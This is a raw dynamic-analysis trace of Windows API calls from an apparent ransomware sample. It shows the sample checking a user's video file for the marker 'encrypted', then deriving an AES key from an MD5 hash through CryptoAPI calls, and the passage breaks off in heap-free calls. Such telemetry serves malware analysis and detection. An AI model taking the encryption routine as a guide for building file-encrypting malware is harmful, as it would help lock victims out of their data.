CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hbnq.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.681] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.682] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.682] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.682] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.682] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.682] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.682] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.682] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.682] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.avi", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b24390, ftCreationTime.dwHighDateTime=0x1d5b968, ftLastAccessTime.dwLowDateTime=0x8e9c0710, ftLastAccessTime.dwHighDateTime=0x1d5c585, ftLastWriteTime.dwLowDateTime=0x8e9c0710, ftLastWriteTime.dwHighDateTime=0x1d5c585, nFileSizeHigh=0x0, nFileSizeLow=0x14221, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="2hbnq.avi", cAlternateFileName="")) returned 0x7c2240 [0041.682] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.682] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.682] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.682] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.682] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.683] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.683] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.683] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.683] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.683] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.683] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.683] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.683] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.683] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.683] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.683] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.683] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0041.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.684] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0041.684] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.684] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.684] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.684] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.685] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.685] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.685] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.685] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.685] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.685] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.686] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.686] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.686] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.686] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.686] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.686] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.686] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.686] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.686] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.686] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.686] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.686] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.687] CryptHashData (hHash=0x7c2100, pbData=0x7c50e0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.687] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.687] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 